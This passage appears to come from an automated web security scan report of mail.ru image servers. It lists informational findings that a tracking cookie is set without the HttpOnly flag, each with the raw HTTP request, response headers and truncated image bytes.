Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1986
Connection: keep-alive
Set-Cookie: p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
17.171. http://r2.mail.ru/b12968616.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12968616.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12968616.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 7638
Connection: keep-alive
Set-Cookie: p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
17.172. http://r2.mail.ru/b12979027.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12979027.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12979027.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2333
Connection: keep-alive
Set-Cookie: p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...
17.173. http://r2.mail.ru/b13039712.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13039712.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13039712.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 1491
Connection: keep-alive
Set-Cookie: p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
17.174. http://r2.mail.ru/b13044176.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13044176.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13044176.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 2252
Connection: keep-alive
Set-Cookie: p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................    .    ..
...


......    ...........C.......................................................................2.2.."..............................
...[SNIP]...
17.175. http://r2.mail.ru/b13049054.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13049054.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13049054.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 19587
Connection: keep-alive
Set-Cookie: p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H....
FExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:39:59.........
...[SNIP]...
17.176. http://r2.mail.ru/b13050852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13050852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13050852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 15500
Connection: keep-alive
Set-Cookie: p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....TExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:43:30.........
...[SNIP]...
17.177. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13057590.swf HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:52 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21720
Connection: keep-alive
Set-Cookie: p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:29:52 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

CWS    .x..x...u\U].7.N.-]...t..HwHs...i.)..QBP.AZ..D.E..T@QJE.l.....u...<...>...q..f......Y........p...`@..@?'.......".b.............0...a..A.h....S.u1.....P.....#..1....}...    U]....... ....'.........
...[SNIP]...
17.178. http://r2.mail.ru/b13058787.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058787.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058787.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3168
Connection: keep-alive
Set-Cookie: p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95
...C.....................................    ...    ......    


.....
.    


...C...........
...



...[SNIP]...
17.179. http://r2.mail.ru/b13058840.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058840.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058840.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1736
Connection: keep-alive
Set-Cookie: p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
17.180. http://r2.mail.ru/b13058851.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058851.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058851.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1405
Connection: keep-alive
Set-Cookie: p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
17.181. http://r2.mail.ru/b13058852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058852.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1184
Connection: keep-alive
Set-Cookie: p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
17.182. http://r2.mail.ru/b13058968.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058968.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058968.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 23542
Connection: keep-alive
Set-Cookie: p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:17 23:49:14.........
...[SNIP]...
17.183. http://r2.mail.ru/b13059223.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059223.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059223.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3609
Connection: keep-alive
Set-Cookie: p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................................................C.......................................................................2.2..".............................    
...[SNIP]...
17.184. http://r2.mail.ru/b13059860.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059860.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059860.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1805
Connection: keep-alive
Set-Cookie: p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................2.2..
...[SNIP]...
17.185. http://r2.mail.ru/b13060405.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060405.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060405.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:24 GMT
Content-Type: image/jpeg
Content-Length: 1285
Connection: keep-alive
Set-Cookie: p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:24 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2.2.."..............................
...[SNIP]...
17.186. http://r2.mail.ru/b13060487.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060487.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060487.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1840
Connection: keep-alive
Set-Cookie: p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.......................

............................... "..".......C.....................................................................2.2.................................
...[SNIP]...
17.187. http://r2.mail.ru/b13061099.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13061099.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13061099.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 3520
Connection: keep-alive
Set-Cookie: p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

